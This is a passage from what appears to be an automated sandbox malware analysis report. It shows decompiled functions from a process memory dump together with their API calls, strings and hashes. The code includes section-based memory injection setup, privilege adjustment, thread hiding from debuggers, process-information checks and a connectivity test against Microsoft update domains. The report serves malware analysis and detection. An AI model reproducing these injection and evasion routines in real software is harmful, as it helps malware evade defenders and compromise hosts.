					 *((intOrPtr*)(__esi + 0x18)) = _v256;
					 *((intOrPtr*)(__esi + 0x10)) = 0;
					 *0x289f6a4(__esi + 0x60,  &_v524, 0x100);
					 *((short*)(__esi + 4)) = _v48.dwNumberOfProcessors;
					_t68 = 0;
					_v8 = 0;
					do {
						E028614DB(_t66,  &_v788, 0, 0x104);
						_t60 =  *0x289fa84( &_v788, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%u", _v8);
						_t70 = _t70 + 0xc;
						if(_t60 == 0) {
							goto L7;
						}
						if(E02862B90(_t66, 0x80000002,  &_v788) != 1) {
							break;
						}
						_t68 = _t68 + 1;
						L7:
						_v8 = _v8 + 1;
					} while (_v8 < 0x20);
					 *((short*)(_t69 + 2)) = _t68;
					return 0x160;
				}
			}



















                        0x0286531a
                        0x02865329
                        0x00000000
                        0x0286533c
                        0x0286534a
                        0x02865351
                        0x0286535d
                        0x02865366
                        0x02865370
                        0x0286537d
                        0x02865387
                        0x02865399
                        0x028653a2
                        0x028653a9
                        0x028653af
                        0x028653be
                        0x028653c7
                        0x028653d6
                        0x028653d9
                        0x028653e3
                        0x028653e7
                        0x028653e9
                        0x028653ec
                        0x028653f9
                        0x0286540d
                        0x02865413
                        0x02865418
                        0x00000000
                        0x00000000
                        0x0286542d
                        0x00000000
                        0x00000000
                        0x0286542f
                        0x02865430
                        0x02865430
                        0x02865433
                        0x02865439
                        0x00000000
                        0x0286543d

                        APIs
                        • GetSystemInfo.KERNEL32(?,?,00000000,00000024,?,00000000,00000100,00000000,00000160), ref: 02865366
                        Strings
                        • , xrefs: 02865433
                        • HARDWARE\DESCRIPTION\System\CentralProcessor\%u, xrefs: 02865407
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoSystem
                        • String ID: $HARDWARE\DESCRIPTION\System\CentralProcessor\%u
                        • API String ID: 31276548-109395992
                        • Opcode ID: c8f324d3675a8258bedd9e96f6e71f8b1d815199a18bb92d2a6b67f2bb080f04
                        • Instruction ID: 173c81efc8e4c1ec4ea79d1c30be831885095ade5ce846f74503a29904f483f4
                        • Opcode Fuzzy Hash: c8f324d3675a8258bedd9e96f6e71f8b1d815199a18bb92d2a6b67f2bb080f04
                        • Instruction Fuzzy Hash: 88310279D0021D9BDB24DFA4CC88AEEB7FCEF08304F5488AAE559E3541D7749A858B20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02870D19 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E02870D19(void* __ecx, void* __eflags) {
				signed int _v8;
				intOrPtr _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				void* __esi;
				signed int _t16;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				signed int _t29;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;

				_t34 = 0;
				_v8 = _v8 & 0;
				_v24 = "update.microsoft.com";
				_v20 = "microsoft.com";
				_v16 = "windowsupdate.microsoft.com";
				_v12 = 0x289240d;
				_t16 = E0286181B(__ecx);
				_t29 = 3;
				_t33 =  *((intOrPtr*)(_t38 + _t16 % _t29 * 4 - 0x14));
				if(E028619D6( *((intOrPtr*)(_t38 + _t16 % _t29 * 4 - 0x14))) != 0) {
					_t21 = E0288524A(_t33,  &_v8); // executed
					_t36 = _t21;
					if(_t36 == 0) {
						L9:
						_t22 = 0;
						L10:
						return _t22;
					}
					if(_v8 > 0) {
						_t34 =  *0x289fd84( *_t36);
					}
					E02885420(_t36);
					if(_t34 == 0) {
						goto L9;
					} else {
						_t24 = E0288575C(_t34, 0x50); // executed
						if(_t24 >= 1) {
							E02885655(_t24, _t24); // executed
						}
						_t22 = 1;
						goto L10;
					}
				}
				return 0;
			}

















                        0x02870d20
                        0x02870d22
                        0x02870d25
                        0x02870d2c
                        0x02870d33
                        0x02870d3a
                        0x02870d41
                        0x02870d48
                        0x02870d4d
                        0x02870d5a
                        0x02870d67
                        0x02870d6c
                        0x02870d70
                        0x02870da1
                        0x02870da1
                        0x02870da3
                        0x00000000
                        0x02870da3
                        0x02870d75
                        0x02870d7f
                        0x02870d7f
                        0x02870d81
                        0x02870d88
                        0x00000000
                        0x02870d8a
                        0x02870d8d
                        0x02870d95
                        0x02870d98
                        0x02870d98
                        0x02870d9d
                        0x00000000
                        0x02870d9d
                        0x02870d88
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: LCT$microsoft.com$update.microsoft.com$windowsupdate.microsoft.com
                        • API String ID: 0-2508637785
                        • Opcode ID: 928d1d7e7f9f49d0d88edd3365f55eb904537b890ccdf46833f86fd70987c818
                        • Instruction ID: 46a5fd78efcde69d81bf1bfa924af71f856603fff2666f954ba4d4b9d3dbc6e1
                        • Opcode Fuzzy Hash: 928d1d7e7f9f49d0d88edd3365f55eb904537b890ccdf46833f86fd70987c818
                        • Instruction Fuzzy Hash: 9001DDBDA40304ABCF10BEA8C5085AF7BBB9F81708F1445559514E3345DB75FA059A51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02863D40 Relevance: 4.6, APIs: 3, Instructions: 50COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 02863D76
                        • AdjustTokenPrivileges.KERNELBASE(00000001,00000000,00000001,00000010,00000000,00000000), ref: 02863DA7
                        • FindCloseChangeNotification.KERNEL32(00000001), ref: 02863DB4
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustChangeCloseFindLookupNotificationPrivilegePrivilegesTokenValue
                        • String ID:
                        • API String ID: 3056834404-0
                        • Opcode ID: 9b56118488ad7c0e55c176774fbc4f52732c1935990427f69ccde44ead655825
                        • Instruction ID: 804a6885c555924c461bcf772b2c9b9957cdd19ae00323ec317e93533c8b9f41
                        • Opcode Fuzzy Hash: 9b56118488ad7c0e55c176774fbc4f52732c1935990427f69ccde44ead655825
                        • Instruction Fuzzy Hash: E8014CBD900209FFDB10DFA0CD89AFE7BBDEB04758F2444A8F506E5081D775AA549B60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02880D68 Relevance: 3.2, APIs: 2, Instructions: 154nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02880D68(intOrPtr _a4, signed short* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				signed int _v28;
				void* _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				signed char _v69;
				long _t108;
				signed int _t116;
				signed int _t121;

				if(_a4 == 0) {
					L6:
					return 0;
				}
				if(_a8 == 0 || ( *_a8 & 0x0000ffff) != 0x12) {
					_v69 = 1;
				} else {
					_v69 = 0;
				}
				if((_v69 & 0x000000ff) != 1) {
					if(_a8[3] != 0) {
						_v20 = _v20 & 0x00000000;
						_v28 = _v28 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v44 = _v44 & 0x00000000;
						_v24 = _v24 & 0x00000000;
						_v8 = _v8 & 0x00000000;
						_v40 = _a8[3] + 0xff;
						_v12 = _a8[3] + 0xff;
						_v68 = 0x18;
						_v64 = _v64 & 0x00000000;
						_v56 = _v56 & 0x00000000;
						_v60 = _v60 & 0x00000000;
						_v52 = _v52 & 0x00000000;
						_v48 = _v48 & 0x00000000;
						E02861807( &_v36, 8);
						_v36 = _v40;
						_t108 = NtCreateSection( &_v24, 0xf001f,  &_v68,  &_v36, 0x40, 0x8000000, 0); // executed
						_v8 = _t108;
						if(_v8 < 0 || _v24 == 0) {
							goto L25;
						} else {
							if(_a8[7] != 0) {
								_v28 = _a8[7];
							}
							_t116 = L02887A4C(_v24, _a4,  &_v28, 0, 0, 0,  &_v40, 2, 0, 0x40); // executed
							_v8 = _t116;
							if(_v8 < 0 || _v28 == 0 || _v40 < _v12) {
								goto L25;
							} else {
								if(_a8[5] != 0) {
									_v16 = _a8[5];
								}
								_t121 = L02887A4C(_v24, 0xffffffff,  &_v16, 0, 0, 0,  &_v40, 2, 0, 0x40); // executed
								_v8 = _t121;
								if(_v8 < 0 || _v16 == 0 || _v40 < _v12) {
									L25:
									if(_v28 != 0) {
										L02887AE2(_a4, _v28);
									}
									if(_v16 != 0) {
										L02887AE2(0xffffffff, _v16);
									}
									if(_v24 != 0) {
										NtClose(_v24); // executed
									}
									return 0;
								} else {
									_a8[1] = _v24;
									_a8[5] = _v16;
									_a8[7] = _v28;
									_a8[3] = _v40;
									return 1;
								}
							}
						}
					}
					return 0;
				} else {
					goto L6;
				}
			}






















                        0x02880d72
                        0x02880d98
                        0x00000000
                        0x02880d98
                        0x02880d78
                        0x02880d8b
                        0x02880d85
                        0x02880d85
                        0x02880d85
                        0x02880d96
                        0x02880da6
                        0x02880daf
                        0x02880db3
                        0x02880db7
                        0x02880dbb
                        0x02880dbf
                        0x02880dc3
                        0x02880dd2
                        0x02880de0
                        0x02880de3
                        0x02880dea
                        0x02880dee
                        0x02880df2
                        0x02880df6
                        0x02880dfa
                        0x02880e04
                        0x02880e0c
                        0x02880e29
                        0x02880e2f
                        0x02880e36
                        0x00000000
                        0x02880e48
                        0x02880e4f
                        0x02880e57
                        0x02880e57
                        0x02880e74
                        0x02880e79
                        0x02880e80
                        0x00000000
                        0x02880e94
                        0x02880e9b
                        0x02880ea3
                        0x02880ea3
                        0x02880ebf
                        0x02880ec4
                        0x02880ecb
                        0x02880f07
                        0x02880f0b
                        0x02880f13
                        0x02880f13
                        0x02880f1c
                        0x02880f23
                        0x02880f23
                        0x02880f2c
                        0x02880f31
                        0x02880f31
                        0x00000000
                        0x02880edf
                        0x02880ee5
                        0x02880eee
                        0x02880ef7
                        0x02880f00
                        0x00000000
                        0x02880f03
                        0x02880ecb
                        0x02880e80
                        0x02880e36
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        • NtCreateSection.NTDLL(00000000,000F001F,00000018,?,00000040,08000000,00000000,?,00000008), ref: 02880E29
                        • NtClose.NTDLL(00000000), ref: 02880F31
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateSection
                        • String ID:
                        • API String ID: 3832541453-0
                        • Opcode ID: 9aa940937458c179bf9dd7c1836f132410bcc8a7685f2e9f6f82fb412ef02b7e
                        • Instruction ID: 5b4c3ec1cf7f8d8b03e240fe6ad47c2712479885facfdb1f4f1a920660b24cbd
                        • Opcode Fuzzy Hash: 9aa940937458c179bf9dd7c1836f132410bcc8a7685f2e9f6f82fb412ef02b7e
                        • Instruction Fuzzy Hash: 8061F379904208EFEF20DF98C849BEDB7F1EB0431AF248455E914EA2D1D374AA88CF55
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028660AA Relevance: 3.1, APIs: 2, Instructions: 74nativethreadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 43%
                        			E028660AA(long _a4) {
				void* __esi;
				long _t22;
				long _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t38;

				_t38 = _a4;
				if(_t38 == 0 ||  *_t38 != 0x90) {
					return 0;
				}
				if(( *(_t38 + 8) & 0x00000080) == 0) {
					_push(0x4d2);
				} else {
					_push(0);
				}
				 *0x289f968( *0x289ec4a);
				NtSetInformationThread(0xfffffffe, 0x11, 0, 0); // executed
				if(E028658DC(_t38) != 0) {
					_t22 =  *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x84))))(_t38); // executed
					_a4 = _t22;
					if(( *(_t38 + 8) & 0x00000020) != 0) {
						_t34 =  *((intOrPtr*)(_t38 + 0x10));
						if(_t34 != 0) {
							_t28 =  *((intOrPtr*)(_t38 + 0xc));
							if(_t28 == 0) {
								_t28 = 4;
							}
							_push(_t28);
							_push(_t34);
							if( *0x289f71c() == 0) {
								E028617E4( *((intOrPtr*)(_t38 + 0x10)));
							}
						}
					}
					E02865815(_t38);
					E028617E4(_t38);
					 *0x289f968( *0x289ec4a, 0x4d2);
					NtTerminateThread(0xfffffffe, _a4); // executed
					_t27 = _a4;
					goto L17;
				} else {
					_t31 =  *((intOrPtr*)(_t38 + 0x78));
					if(_t31 != 0) {
						 *0x289f824(_t31);
					}
					E028617E4(_t38);
					_t27 = 0;
					L17:
					return _t27;
				}
			}










                        0x028660b0
                        0x028660b5
                        0x00000000
                        0x028660c1
                        0x028660d2
                        0x028660d8
                        0x028660d4
                        0x028660d4
                        0x028660d4
                        0x028660df
                        0x028660ed
                        0x028660fa
                        0x0286611b
                        0x02866121
                        0x02866124
                        0x02866126
                        0x0286612b
                        0x0286612d
                        0x02866132
                        0x02866136
                        0x02866136
                        0x02866137
                        0x02866138
                        0x02866141
                        0x02866146
                        0x02866146
                        0x02866141
                        0x0286612b
                        0x0286614b
                        0x02866151
                        0x0286615d
                        0x02866168
                        0x0286616e
                        0x00000000
                        0x028660fc
                        0x028660fc
                        0x02866101
                        0x02866104
                        0x02866104
                        0x0286610b
                        0x02866110
                        0x02866171
                        0x00000000
                        0x02866171

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000), ref: 028660ED
                        • NtTerminateThread.NTDLL(000000FE,00000020), ref: 02866168
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Thread$InformationTerminate
                        • String ID:
                        • API String ID: 1058300421-0
                        • Opcode ID: 1690f5bee76e77b855fb5de9a9ea00daf5687c36b0eee3ed68f14cbeb689082b
                        • Instruction ID: 8fc214ea4382485bfe47b77bca1c697e1b38ecc6355af2bef50c0797430b5731
                        • Opcode Fuzzy Hash: 1690f5bee76e77b855fb5de9a9ea00daf5687c36b0eee3ed68f14cbeb689082b
                        • Instruction Fuzzy Hash: 7721233CA00361BBDB205B34DC4CBBA7BA8AF11714F184929FA46E25D2EB24D440CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028644F0 Relevance: 3.1, APIs: 2, Instructions: 51nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E028644F0(void* _a4) {
				long _v8;
				void _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void _v44;
				long _t22;
				long _t25;
				void* _t27;

				if(_a4 == 0) {
					L9:
					return 1;
				}
				_v8 = 0;
				_v12 = 0;
				E028614DB(_t27,  &_v44, 0, 0x20);
				_t22 = NtQueryInformationProcess(_a4, 0x14,  &_v12, 4,  &_v8); // executed
				if(_t22 < 0 || _v8 == 0) {
					goto L9;
				} else {
					_t25 = NtQueryInformationProcess(_a4, 4,  &_v44, 0x20,  &_v8); // executed
					if(_t25 < 0 || _v8 == 0 || _v16 != 0 || _v20 >= 0x3e8 || _v12 >= 3) {
						goto L9;
					} else {
						return 0;
					}
				}
			}











                        0x028644fc
                        0x02864564
                        0x00000000
                        0x02864566
                        0x02864505
                        0x02864508
                        0x0286450b
                        0x0286451f
                        0x02864527
                        0x00000000
                        0x0286452e
                        0x0286453d
                        0x02864545
                        0x00000000
                        0x02864560
                        0x00000000
                        0x02864560
                        0x02864545

                        APIs
                        • NtQueryInformationProcess.NTDLL(00000208,00000014,00000208,00000004,00000002,00000478,00000000,00000020,00000208,00000478,?,0000002A,?,00000012,?,00000208), ref: 0286451F
                        • NtQueryInformationProcess.NTDLL(00000020,00000004,?,00000020,?), ref: 0286453D
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: e3f2ab6aca43d8bb4e03a585093e4cb066bd86f9a85a7244a90e997b8008846c
                        • Instruction ID: 31b1c9a85c74328495a4b9ee528a4d769e94666b45d75fdb24a397027bcbea68
                        • Opcode Fuzzy Hash: e3f2ab6aca43d8bb4e03a585093e4cb066bd86f9a85a7244a90e997b8008846c
                        • Instruction Fuzzy Hash: D801DBB9A41318FBDB21DAA4C84CEEDBABCAB45B45F044066F605E10A0D3709784DB99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02864E69 Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 66%
                        			E02864E69(void* __ebx, void* __ecx, void* __esi, void* _a4) {
				long _v8;
				long _v12;
				intOrPtr _t13;
				long _t16;
				intOrPtr _t18;
				void* _t28;

				_push(__ecx);
				_push(__ecx);
				if(_a4 == 0 || __ebx == 0) {
					_t13 = 0;
				} else {
					if(( *0x289fdc8 & 0x00000081) != 0) {
						_t13 = E02864DEF(__ecx, _a4, __ebx);
					} else {
						_v8 = 0;
						_v12 = 0;
						_t28 = E0286161B(0x828);
						if(_t28 != 0) {
							_t16 = NtQueryInformationProcess(_a4, 0x2b, _t28, 0x826,  &_v8); // executed
							if(_t16 >= 0 && _v8 != 0) {
								_t18 =  *((intOrPtr*)(_t28 + 4));
								if(_t18 != 0 &&  *_t28 != 0) {
									 *0x289f6a4(__ebx, _t18, 0x103);
									_v12 = E028619E8(__ebx);
								}
							}
							E028617E4(_t28);
						}
						_t13 = _v12;
					}
				}
				return _t13;
			}









                        0x02864e6c
                        0x02864e6d
                        0x02864e74
                        0x02864ef2
                        0x02864e7a
                        0x02864e81
                        0x02864eeb
                        0x02864e83
                        0x02864e89
                        0x02864e8c
                        0x02864e94
                        0x02864e98
                        0x02864ea9
                        0x02864eb1
                        0x02864eb8
                        0x02864ebd
                        0x02864ecb
                        0x02864ed8
                        0x02864ed8
                        0x02864ebd
                        0x02864edc
                        0x02864edc
                        0x02864ee1
                        0x02864ee4
                        0x02864e81
                        0x02864ef6

                        APIs
                        • NtQueryInformationProcess.NTDLL(00000208,0000002B,00000000,00000826,00000002,00000828,00000208,00000000,?,?,?,02881C96,00000000,00000000,00000000,00000000), ref: 02864EA9
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 1b6e86fbc88d226a2e1b2c2f0589507a07d961727f77c4e4ef068169fbf18fe1
                        • Instruction ID: 14c3954fc0257f92f67475c2be83fd27daa7f8ba2449c3f374000e3d5df7fd80
                        • Opcode Fuzzy Hash: 1b6e86fbc88d226a2e1b2c2f0589507a07d961727f77c4e4ef068169fbf18fe1
                        • Instruction Fuzzy Hash: 8B01D63CE00608BEDB319FE8DC8C8BFBAA9EF50764F144516E909D6181EB718990C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028656F5 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?), ref: 0286572B
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationTimeZone
                        • String ID:
                        • API String ID: 565725191-0
                        • Opcode ID: c3d885d375f23a1ac400ea88653ff46532f0239dbf17df5e04105255879a186f
                        • Instruction ID: 20176902eab891130aad1bcb4bdb744210187fac3cd42f39596677fff6dc11e5
                        • Opcode Fuzzy Hash: c3d885d375f23a1ac400ea88653ff46532f0239dbf17df5e04105255879a186f
                        • Instruction Fuzzy Hash: B601D72DD1030ADACB209FE0D1086EEB3F8AF18704F10995AE969E3A50E3349646CB65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 028644A2 Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E028644A2(void* __ecx, void* _a4) {
				long _v8;
				void _v12;
				void* _t11;
				long _t14;

				if(_a4 == 0) {
					L6:
					_t11 = 0;
				} else {
					if(( *0x289fdc8 & 0x00000200) != 0) {
						_v8 = 0;
						_v12 = 0;
						_t14 = NtQueryInformationProcess(_a4, 0x1a,  &_v12, 4,  &_v8); // executed
						if(_t14 < 0 || _v8 == 0 || _v12 == 0) {
							goto L6;
						} else {
							goto L2;
						}
					} else {
						L2:
						_t11 = 1;
					}
				}
				return _t11;
			}







                        0x028644ad
                        0x028644e9
                        0x028644e9
                        0x028644af
                        0x028644b9
                        0x028644cf
                        0x028644d2
                        0x028644d5
                        0x028644dd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x028644bb
                        0x028644bb
                        0x028644bd
                        0x028644bd
                        0x028644b9
                        0x028644ed

                        APIs
                        • NtQueryInformationProcess.NTDLL(028637B0,0000001A,028637B0,00000004,00000000,-0000000C,?,?,?,028637B0,00000000), ref: 028644D5
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: 5abba021619374e66330001b7d88922c74be93bc38469fe57dd319c738758ffe
                        • Instruction ID: 7432b06f9bafc72ebe1c0875298c8d23b1059ce351a60db27721de42978380f9
                        • Opcode Fuzzy Hash: 5abba021619374e66330001b7d88922c74be93bc38469fe57dd319c738758ffe
                        • Instruction Fuzzy Hash: 17F0547D902318FFDB31CE90D84AABEB668EB04B48F14856AFA05D1880D3709690D690
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02864D45 Relevance: 1.5, APIs: 1, Instructions: 26nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02864D45(void* _a4) {
				long _v12;
				intOrPtr _v32;
				void _v36;
				long _t14;
				void* _t16;

				_v12 = _v12 & 0x00000000;
				if(_a4 == 0) {
					L3:
					return 0;
				}
				E028614DB(_t16,  &_v36, 0, 0x18);
				_t14 = NtQueryInformationProcess(_a4, 0,  &_v36, 0x18,  &_v12); // executed
				if(_t14 < 0) {
					goto L3;
				}
				return _v32;
			}








                        0x02864d4b
                        0x02864d53
                        0x02864d80
                        0x00000000
                        0x02864d80
                        0x02864d5d
                        0x02864d71
                        0x02864d79
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000,?,00000000,00000018,?,?,02864DB9,00000000,?,00000000,000001DC), ref: 02864D71
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationProcessQuery
                        • String ID:
                        • API String ID: 1778838933-0
                        • Opcode ID: dd8fae4819747bd1a973d9e086d2619f3e10170bd284d842d11425f87f877d6d
                        • Instruction ID: b6aeb26c20390329fba7e4d138b66137b7cac2c3b917fe0d63bb2fa256d57886
                        • Opcode Fuzzy Hash: dd8fae4819747bd1a973d9e086d2619f3e10170bd284d842d11425f87f877d6d
                        • Instruction Fuzzy Hash: BDE03979A4020CAAEB11DAA4CC49FFE76BCAB04748F008020E601E90C0D774E6848BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02865BED Relevance: 1.5, APIs: 1, Instructions: 20nativethreadCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02865BED(void* __ecx, void* _a4) {
				void _v8;
				long _t10;

				_v8 = _v8 | 0xffffffff;
				if(_a4 == 0) {
					return 0;
				}
				_t10 = NtSetInformationThread(_a4, 3,  &_v8, 4); // executed
				return 0 | _t10 > 0x00000000;
			}





                        0x02865bf1
                        0x02865bf9
                        0x00000000
                        0x02865c17
                        0x02865c06
                        0x00000000

                        APIs
                        • NtSetInformationThread.NTDLL(00000000,00000003,000000FF,00000004,?,?,0288448C,00000000,?,?,0286DF35,0286E0E2), ref: 02865C06
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: InformationThread
                        • String ID:
                        • API String ID: 4046476035-0
                        • Opcode ID: 9f93ec9b1e36b0822b43437e93d58f3719a896f156123009e9e3327c01a109b4
                        • Instruction ID: 68b21e760adcf89b695dcca7553928a95122ebd25f519ebb0e96861db121d8a9
                        • Opcode Fuzzy Hash: 9f93ec9b1e36b0822b43437e93d58f3719a896f156123009e9e3327c01a109b4
                        • Instruction Fuzzy Hash: 95E05B79311209FFEB298B74DC0AFAF76AC9B01754F5082757612D50E0D774CB50DA50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02880E92 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E02880E92() {
				void* _t12;

				if( *((intOrPtr*)(_t12 - 0x18)) != 0) {
					L02887AE2( *((intOrPtr*)(_t12 + 8)),  *((intOrPtr*)(_t12 - 0x18)));
				}
				if( *((intOrPtr*)(_t12 - 0xc)) != 0) {
					L02887AE2(0xffffffff,  *((intOrPtr*)(_t12 - 0xc)));
				}
				if( *(_t12 - 0x14) != 0) {
					NtClose( *(_t12 - 0x14)); // executed
				}
				return 0;
			}




                        0x02880f0b
                        0x02880f13
                        0x02880f13
                        0x02880f1c
                        0x02880f23
                        0x02880f23
                        0x02880f2c
                        0x02880f31
                        0x02880f31
                        0x02880f3a

                        APIs
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
